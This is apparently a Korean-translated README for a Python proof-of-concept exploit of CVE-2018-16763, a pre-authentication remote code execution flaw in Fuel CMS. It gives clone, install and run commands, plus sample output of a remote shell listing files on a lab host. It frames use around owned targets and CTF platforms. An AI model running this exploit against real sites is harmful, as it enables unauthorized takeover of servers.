
CVE-2018-16763 (Fuel CMS - 사전 인증 원격 코드 실행)에 대한 개념 증명(PoC) 익스플로잇입니다.
CVE-2018-16763 (Fuel CMS - 인증 전 원격 코드 실행)에 대한 개념 증명(PoC) 익스플로잇입니다.
이 Python 3 프로그램은 Fuel CMS 콘텐츠 관리 시스템의 CVE-2018-16763 취약점에 대한 PoC 역할을 합니다. 구체적으로 이 취약점은 pages/select/filter 매개변수(이 PoC에서 구현됨)를 통한 PHP 코드 평가를 허용하여, 인증 전 원격 코드 실행이라는 심각한 시스템 취약점으로 이어집니다.
git clone https://github.com/saccles/CVE-2018-16763-Proof-of-Concept.git
cd CVE-2018-16763-Proof-of-Concept
python3 -m pip install -r requirements.txt
취약한 대상에 대해 익스플로잇 스크립트를 실행합니다. (소유한 대상 또는 TryHackMe, HackTheBox 또는 기타 윤리적 해킹 웹사이트에서 제공하는 대상에 대해서만 스크립트를 실행하세요!) 자세한 내용은 TryHackMe의 'Ignite' 챌린지를 확인하는 것이 좋습니다. exploit-db.com에서 취약한 Fuel CMS 애플리케이션을 다운로드할 수도 있습니다.
python3 CVE-2018-16763.py -u URL
[DEBUG] Connecting to http://10.10.60.46 ...
[DEBUG] Succesfully connected!
Enter Command:
$ ls -la
total 52
drwxrwxrwx 4 root root 4096 Jul 26 2019 .
drwxr-xr-x 3 root root 4096 Jul 26 2019 ..
-rw-r--r-- 1 root root 163 Jul 26 2019 .htaccess
-rwxrwxrwx 1 root root 1427 Jul 26 2019 README.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 assets
-rwxrwxrwx 1 root root 193 Jul 26 2019 composer.json
-rwxrwxrwx 1 root root 6502 Jul 26 2019 contributing.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 fuel
-rwxrwxrwx 1 root root 11802 Jul 26 2019 index.php
-rwxrwxrwx 1 root root 30 Jul 26 2019 robots.txt
python3 CVE-2018-16763.py -h
usage: CVE-2018-16763.py [-h] -u URL
This tool exploits CVE-2018-16763 on Fuel CMS.
options:
-h, --help show this help message and exit
-u URL, --url URL Fuel CMS url.
Silas Accles [saccles]
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE.md 파일을 참조하세요.
Exploit-DB 프로그램, Vozec의 PoC 스크립트 및 Padsala Trushal이 개발한 원본 PoC에서 큰 영감을 받았습니다.